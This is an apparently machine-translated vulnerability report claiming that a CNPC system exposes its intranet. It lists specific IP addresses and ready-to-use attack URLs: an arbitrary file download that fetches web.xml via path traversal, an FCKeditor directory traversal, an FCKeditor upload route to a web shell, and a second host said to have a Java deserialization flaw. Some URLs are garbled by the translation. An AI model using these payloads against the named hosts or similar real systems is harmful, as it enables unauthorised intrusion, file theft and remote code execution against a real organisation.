A system vulnerability package of CNPC can threaten the Intranet.
Rt
A system vulnerability package under CNPC can threaten the Intranet.
System address: http: // 61.158.56.15: 7001/logonAction. do
1 # download any file
Http: // 61.158.56.15: 7001 // B2B/web/fileuploadAction. do? Method = downLoad & fileName = web. xml & fileType = application/octet-stream & fjbh = web & fjml =/fileuploadsave/SCFBXX/.../WEB-INF/
2 # fck editor Directory Traversal
Http: // 61.158.56.15: 7001/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector ctor? Command = GetFoldersAndFiles & Type = File & CurrentFolder = /../../../
3 # upload any file in the fck editor to getshell
http://61.158.56.15:7001//fckeditor/editor/filemanager/browser/default/browser.html?Connector=http://61.158.56.15:7001//fckeditor/editor/filemanager/browser/default/connectors/jsp/connector
Another server has the java deserialization vulnerability:
Http: // 61.158.56.10: 7001/console/login/LoginForm. jsp